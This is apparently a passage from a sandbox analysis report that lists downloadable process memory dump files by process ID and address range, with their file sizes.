memory/1928-401-0x0000000000000000-mapping.dmp

Download
memory/1928-103-0x0000000000000000-mapping.dmp

Download
memory/1948-108-0x0000000000000000-mapping.dmp

Download
memory/1956-112-0x0000000000690000-0x0000000000696000-memory.dmp

Filesize
24KB

Download
memory/1956-62-0x0000000000000000-mapping.dmp

Download
memory/1956-71-0x000000013F220000-0x000000013F67E000-memory.dmp

Filesize
4.4MB

Download
memory/1972-118-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-120-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-129-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-123-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-121-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-116-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-125-0x0000000140001844-mapping.dmp

Download
memory/1972-124-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-119-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-113-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-127-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1972-114-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1984-411-0x0000000000000000-mapping.dmp

Download
memory/2004-107-0x0000000000000000-mapping.dmp

Download
memory/2004-423-0x0000000000000000-mapping.dmp

Download
memory/2008-111-0x0000000000000000-mapping.dmp

Download
memory/2024-349-0x0000000000000000-mapping.dmp

Download
memory/2024-101-0x0000000000000000-mapping.dmp

Download
memory/2040-180-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/2040-151-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/2040-152-0x00000000004039E0-mapping.dmp

Download
memory/2040-189-0x00000000001A0000-0x00000000001BB000-memory.dmp

Filesize
108KB

Download
memory/2040-166-0x00000000001A0000-0x00000000001BB000-memory.dmp

Filesize
108KB

Download
memory/2040-191-0x0000000077960000-0x0000000077AE0000-memory.dmp

Filesize
1.5MB

Download
memory/2040-193-0x0000000000200000-0x0000000000221000-memory.dmp

Filesize
132KB

Download
memory/2040-109-0x0000000000000000-mapping.dmp

Download
memory/2040-157-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download